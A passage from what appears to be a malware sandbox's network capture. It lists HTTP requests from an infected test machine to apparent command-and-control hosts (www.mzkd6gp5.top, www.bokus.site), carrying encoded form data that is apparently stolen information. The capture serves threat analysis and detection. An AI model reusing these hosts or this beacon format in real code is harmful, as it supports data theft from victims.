                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 34 58 4a 33 6e 47 45 56 43 58 2f 32 6c 38 56 62 72 69 46 4a 36 52 38 58 54 6f 57 30 43 6f 45 57 75 58 67 37 37 4f 6b 70 7a 57 6e 7a 63 50 37 48 4c 35 47 50 76 48 6c 71 6d 66 6b 6e 67 67 32 6f 42 6a 73 30 65 31 4d 59 75 53 6e 67 70 6a 36 61 67 48 64 4e 56 35 65 76 37 62 7a 70 45 76 50 53 62 38 44 31 73 7a 6c 45 4c 68 72 2f 2b 66 2b 58 55 77 6a 4c 38 71 79 50 6a 30 45 34 2b 65 38 6b 39 46 69 31 48 4c 45 6f 47 78 36 35 7a 57 77 6d 61 33 6f 4f 46 37 73 77 76 31 51 31 34 52 75 66 6f 59 2b 49 76 6a 57 45 41 63 36 54 75 4a 64 4d 34 50 46 54 48 77 3d 3d
                                                                                    Data Ascii: 6B-l7F=h0wTz0QM+szd4XJ3nGEVCX/2l8VbriFJ6R8XToW0CoEWuXg77OkpzWnzcP7HL5GPvHlqmfkngg2oBjs0e1MYuSngpj6agHdNV5ev7bzpEvPSb8D1szlELhr/+f+XUwjL8qyPj0E4+e8k9Fi1HLEoGx65zWwma3oOF7swv1Q14RufoY+IvjWEAc6TuJdM4PFTHw==
                                                                                    Jan 9, 2025 16:57:53.012433052 CET820INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:57:52 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tQAztm%2Busp1qpHvsfHfUeQwzc%2BafZQwG06p1eq8mBC4xyYIQJfAJ4ThgRrm%2FdwRG%2FMn5NfemRFQF3LcW7naKbWG1FdOVeJREGAgxB9ofgZmxJabJc1qIVnc%2BHP0JK7I5U2Y8"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff5a023581ee269-ORD
                                                                                    Content-Encoding: gzip
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=119349&min_rtt=119349&rtt_var=59674&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                                    Data Ascii: f
                                                                                    Jan 9, 2025 16:57:53.012442112 CET105INData Raw: 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9
                                                                                    Data Ascii: 63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                    Jan 9, 2025 16:57:53.012449026 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    59192.168.11.3049884104.21.32.180
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:57:55.125240088 CET819OUTPOST /3u0p/ HTTP/1.1
                                                                                    Host: www.mzkd6gp5.top
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.mzkd6gp5.top
                                                                                    Referer: http://www.mzkd6gp5.top/3u0p/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 35 33 35 33 6d 68 6f 56 48 33 2f 33 35 73 56 62 68 43 46 4e 36 52 41 58 54 70 6a 7a 44 65 63 57 74 79 63 37 70 2f 6b 70 79 57 6e 7a 46 2f 37 4f 57 4a 47 45 76 48 5a 49 6d 62 6b 6e 67 67 79 6f 42 68 30 30 66 45 4d 62 76 43 6e 69 6d 44 36 59 76 6e 64 4e 56 35 65 76 37 62 6d 4d 45 72 6a 53 59 4e 7a 31 74 53 6c 48 43 42 72 38 75 76 2b 58 44 67 6a 50 38 71 7a 63 6a 32 77 65 2b 59 67 6b 39 45 79 31 48 65 6f 72 52 42 36 2f 33 57 78 70 4c 31 5a 47 4a 34 49 59 6a 6d 49 75 79 55 32 4c 70 50 54 53 79 67 69 47 54 38 47 2b 79 49 77 6b 36 4e 45 49 61 35 51 2f 2f 42 54 78 4b 4f 37 43 76 49 33 6c 75 69 4f 64 30 6a 6f 3d
                                                                                    Data Ascii: 6B-l7F=h0wTz0QM+szd5353mhoVH3/35sVbhCFN6RAXTpjzDecWtyc7p/kpyWnzF/7OWJGEvHZImbknggyoBh00fEMbvCnimD6YvndNV5ev7bmMErjSYNz1tSlHCBr8uv+XDgjP8qzcj2we+Ygk9Ey1HeorRB6/3WxpL1ZGJ4IYjmIuyU2LpPTSygiGT8G+yIwk6NEIa5Q//BTxKO7CvI3luiOd0jo=
                                                                                    Jan 9, 2025 16:57:55.676002979 CET919INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:57:55 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8%2BVEtQ15KiJojdThOkBwjCnxmg%2FDDUgvIUVzUVGpFxZIW18r61XTVZF0rX%2BoGg3Bh%2F5JM8mfIcn%2FUEGHb6xalBxmM9i8QzT1rOIybO%2F77fIRQjTusn3HMcmFOhRmnA%2FogHEz"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff5a033eda6233a-ORD
                                                                                    Content-Encoding: gzip
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=119336&min_rtt=119336&rtt_var=59668&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=819&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                                    Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                    Jan 9, 2025 16:57:55.676012039 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    60192.168.11.3049885104.21.32.180
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:57:57.782006979 CET1289OUTPOST /3u0p/ HTTP/1.1
                                                                                    Host: www.mzkd6gp5.top
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.mzkd6gp5.top
                                                                                    Referer: http://www.mzkd6gp5.top/3u0p/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 35 33 35 33 6d 68 6f 56 48 33 2f 33 35 73 56 62 68 43 46 4e 36 52 41 58 54 70 6a 7a 44 65 55 57 75 48 51 37 37 6f 77 70 31 57 6e 7a 4e 66 37 4c 57 4a 47 5a 76 48 78 4d 6d 62 68 63 67 69 36 6f 42 41 55 30 59 32 30 62 6d 43 6e 69 74 6a 36 62 67 48 64 59 56 35 4f 56 37 62 32 4d 45 72 6a 53 59 4f 72 31 71 44 6c 48 45 42 72 2f 2b 66 2b 4c 55 77 6a 33 38 71 72 4d 6a 32 30 52 2b 65 30 6b 38 33 36 31 47 6f 63 72 52 42 36 2f 36 32 78 6f 4c 31 56 48 4a 34 51 4d 6a 6e 41 2b 79 69 4b 4c 70 36 4f 37 33 68 69 33 52 4f 32 48 75 4c 51 4e 74 66 63 47 55 4b 6b 4d 2f 69 66 64 63 65 2f 53 68 6f 76 77 38 42 4c 58 32 6b 76 55 6c 56 33 72 55 53 34 31 53 6b 2b 39 72 50 63 71 62 43 37 62 6c 59 39 2f 32 56 32 6a 4b 71 43 64 2b 6e 71 69 61 69 79 78 58 69 36 35 71 72 38 4f 4a 71 45 4e 6d 55 35 53 63 45 51 69 75 4b 75 45 41 66 79 30 56 52 4c 4e 59 4e 49 4f 44 38 4f 63 6e 78 66 6d 7a 67 4c 65 6b 5a 2f 62 4e 61 33 57 33 68 6a 72 64 32 6a 76 49 38 32 4f 35 6c 77 2f 32 78 67 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=h0wTz0QM+szd5353mhoVH3/35sVbhCFN6RAXTpjzDeUWuHQ77owp1WnzNf7LWJGZvHxMmbhcgi6oBAU0Y20bmCnitj6bgHdYV5OV7b2MErjSYOr1qDlHEBr/+f+LUwj38qrMj20R+e0k8361GocrRB6/62xoL1VHJ4QMjnA+yiKLp6O73hi3RO2HuLQNtfcGUKkM/ifdce/Shovw8BLX2kvUlV3rUS41Sk+9rPcqbC7blY9/2V2jKqCd+nqiaiyxXi65qr8OJqENmU5ScEQiuKuEAfy0VRLNYNIOD8OcnxfmzgLekZ/bNa3W3hjrd2jvI82O5lw/2xg3AihK+ACLA/mCdJjxtFSBkFmooipa002KHAx1R7WYE8UR7WhOZigYgq5OajRn7NdUGHmYC1NCStHf8x6sLLa0/i7PWvB0WeWx52tSAiBdhmvYJgBROa+BTkQ1BzYPQYPYxe3JDbnYPZAoChVGQjvOy/KcgaJPnU+/nUYJhkQmvDzsiy4fPFCH321gcvIasdu5eZYz8kVY2oA6F90fEJAlCSY3yS0UnoZvbUXmEHhQK4kH0Flzpr9OAQpefvCphmwUEO36bT+RBaLiLl3vGlLABU7gcP4y16lsgX9jGhCwqem3mM/oJ7OMwV3zyQaATjKmZ6TcG54pJQZGK5Zu1XRsH++9pnWQOGgZ7
                                                                                    Jan 9, 2025 16:57:57.782058954 CET2647OUTData Raw: 7a 62 79 43 76 53 74 73 39 4e 6c 31 55 43 76 32 50 4b 6c 44 34 52 44 2b 62 48 52 4b 6f 46 4a 79 64 4a 30 57 77 62 31 57 74 30 35 68 50 30 76 34 4d 63 39 79 33 6a 72 6a 67 48 58 43 53 33 2b 36 6b 47 45 6d 49 6a 4d 61 47 70 79 36 6c 54 6c 38 68 64
                                                                                    Data Ascii: zbyCvSts9Nl1UCv2PKlD4RD+bHRKoFJydJ0Wwb1Wt05hP0v4Mc9y3jrjgHXCS3+6kGEmIjMaGpy6lTl8hd98byvOiynP85ke6zWthD+c869bmHCp/ScJ3oNuRt8mY9HGvfIlWxURU6LhKkY9QO3FPlUEBnsvEVihs4igtfasTmsHs1Y7/UPklpDCH3A3V3z1+GL20+i8QwMPXZPbj3TX3Xxo6reJ0VnPYOzln0j8kVDRtBXX+7w
                                                                                    Jan 9, 2025 16:57:58.347882032 CET910INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:57:58 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DnnF83MshvNWhunqlYjFBVtSSDHeezi9y%2FfglLtwhYbufnIIrSg9HZsg9z04dXexydWa07AfZxi8WZv2zilxPTF2Xf7ZaaufoPn8PHRc2ql4bQaoR%2FMHY7OjlU11TTd8OrPQ"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff5a0448a6a10ed-ORD
                                                                                    Content-Encoding: gzip
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=118564&min_rtt=118564&rtt_var=59282&sent=3&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=3936&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                                    Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                    Jan 9, 2025 16:57:58.347898006 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    61192.168.11.3049886104.21.32.180
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:58:00.434335947 CET535OUTGET /3u0p/?6B-l7F=s2YzwEkhsdaL/kJXp3k+A3KGmeJ3qBEv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/7SrF93BKOupqiEzChM=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.mzkd6gp5.top
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:58:00.984829903 CET928INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:58:00 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kwE%2BxxjkBYKmn%2FLrgRASdSOP2JOWtsaIhHx7j8%2FGqIIdLoEVSqLZ2V46eevsA7lCP8j0G67TTIC9gRTIwQL8TB%2FHQ0CAkZAJWJfRPL0In0yZxGWstAsIG95aubTuckrO6%2BKp"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff5a0552864e269-ORD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=119652&min_rtt=119652&rtt_var=59826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=535&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                    Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                    Jan 9, 2025 16:58:00.984838963 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    62192.168.11.3049887199.192.21.16980
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:58:06.199731112 CET793OUTPOST /qps0/ HTTP/1.1
                                                                                    Host: www.bokus.site
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bokus.site
                                                                                    Referer: http://www.bokus.site/qps0/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 32 4a 72 77 2f 65 56 54 2f 50 6a 54 68 4b 76 32 56 2b 4e 63 59 49 55 59 64 47 4c 71 62 67 50 74 6b 43 69 39 74 79 38 5a 30 6d 68 73 47 38 32 2b 73 6b 67 6c 79 4d 6f 6f 53 73 6c 36 4f 31 51 61 69 50 4a 63 32 63 70 39 4b 48 5a 4e 6f 46 4e 58 4a 5a 31 35 4c 6c 44 6d 34 43 32 51 5a 4d 48 6b 37 47 50 33 5a 75 6b 55 78 72 4f 6b 49 65 56 30 59 31 32 5a 6a 68 67 67 55 39 6d 46 2b 57 44 56 63 63 4b 44 48 4b 37 36 31 58 72 41 75 4b 76 68 35 7a 6d 70 39 45 39 43 4b 2f 7a 47 75 4e 6c 31 62 55 41 74 66 4d 6c 46 63 2b 69 2b 69 59 4c 76 64 49 63 42 76 41 3d 3d
                                                                                    Data Ascii: 6B-l7F=lcXtcPN+FJHJ2Jrw/eVT/PjThKv2V+NcYIUYdGLqbgPtkCi9ty8Z0mhsG82+skglyMooSsl6O1QaiPJc2cp9KHZNoFNXJZ15LlDm4C2QZMHk7GP3ZukUxrOkIeV0Y12ZjhggU9mF+WDVccKDHK761XrAuKvh5zmp9E9CK/zGuNl1bUAtfMlFc+i+iYLvdIcBvA==
                                                                                    Jan 9, 2025 16:58:06.392939091 CET918INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:58:06 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 774
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    63192.168.11.3049888199.192.21.16980
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:58:08.913022041 CET813OUTPOST /qps0/ HTTP/1.1
                                                                                    Host: www.bokus.site
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bokus.site
                                                                                    Referer: http://www.bokus.site/qps0/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 72 74 71 41 71 39 73 78 6b 5a 33 6d 68 73 56 38 32 37 69 45 67 79 79 4d 6b 4b 53 6f 6c 36 4f 32 73 61 69 4f 35 63 78 72 64 2b 49 58 5a 50 78 31 4e 56 44 35 31 35 4c 6c 44 6d 34 43 79 32 5a 4d 66 6b 37 57 66 33 66 38 41 62 37 4c 4f 6e 42 2b 56 30 50 46 32 64 6a 68 68 4e 55 38 71 76 2b 51 48 56 63 59 4f 44 48 59 54 31 67 6e 72 47 71 4b 75 4f 34 41 37 45 31 6e 6c 31 62 75 48 69 32 75 78 74 65 44 74 33 43 50 52 48 50 65 65 54 2b 5a 6d 48 66 4b 64 61 79 45 45 43 62 77 4d 2b 74 52 6e 6a 61 2b 4d 6d 2f 5a 35 7a 51 7a 49 3d
                                                                                    Data Ascii: 6B-l7F=lcXtcPN+FJHJ5NXw85BTu/jU86v2beNYYIYYdDyybSrtqAq9sxkZ3mhsV827iEgyyMkKSol6O2saiO5cxrd+IXZPx1NVD515LlDm4Cy2ZMfk7Wf3f8Ab7LOnB+V0PF2djhhNU8qv+QHVcYODHYT1gnrGqKuO4A7E1nl1buHi2uxteDt3CPRHPeeT+ZmHfKdayEECbwM+tRnja+Mm/Z5zQzI=
                                                                                    Jan 9, 2025 16:58:09.106559992 CET918INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:58:09 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 774
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    64192.168.11.3049889199.192.21.16980
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:58:11.627082109 CET2578OUTPOST /qps0/ HTTP/1.1
                                                                                    Host: www.bokus.site
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bokus.site
                                                                                    Referer: http://www.bokus.site/qps0/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
